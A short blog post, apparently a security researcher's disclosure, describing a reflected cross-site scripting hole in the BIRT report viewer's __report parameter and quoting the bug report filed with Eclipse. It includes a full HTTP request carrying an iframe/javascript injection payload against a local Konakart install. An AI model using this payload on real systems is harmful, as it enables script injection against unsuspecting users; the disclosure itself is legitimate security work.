AntiSnatch0r

As I was doing an analysis on a few JEE applications that were using BIRT as default report/graph generation engine, I’ve found an XSS hole (reflected). They will fix it in version 2.5.0 (milestone), even if now the latest stable production version is 2.3.1: quite funny.

Here below my post on bugs.eclipse.org :

A Reflected XSS is present in the _report parameter: here below
th modified request (that is the BIRT 2.2.1 version included in
Konakart 2.2.6)

GET
/birt-viewer/run?__report='"><iframe%20src=javascript:alert(666)>
&r=-703171660 HTTP/1.1
Host: localhost:8780
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,
text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://localhost:8780/konakartadmin/

Konakart is actually using
org.eclipse.birt.core_2.2.1.r22x_v20070924, that is actually
old I guess.

I don't have the time to try the exploit on newer versions,
I leave this to you, even if I suppose that newer version will
be vulnerable too.

Thanks

Michele Orru'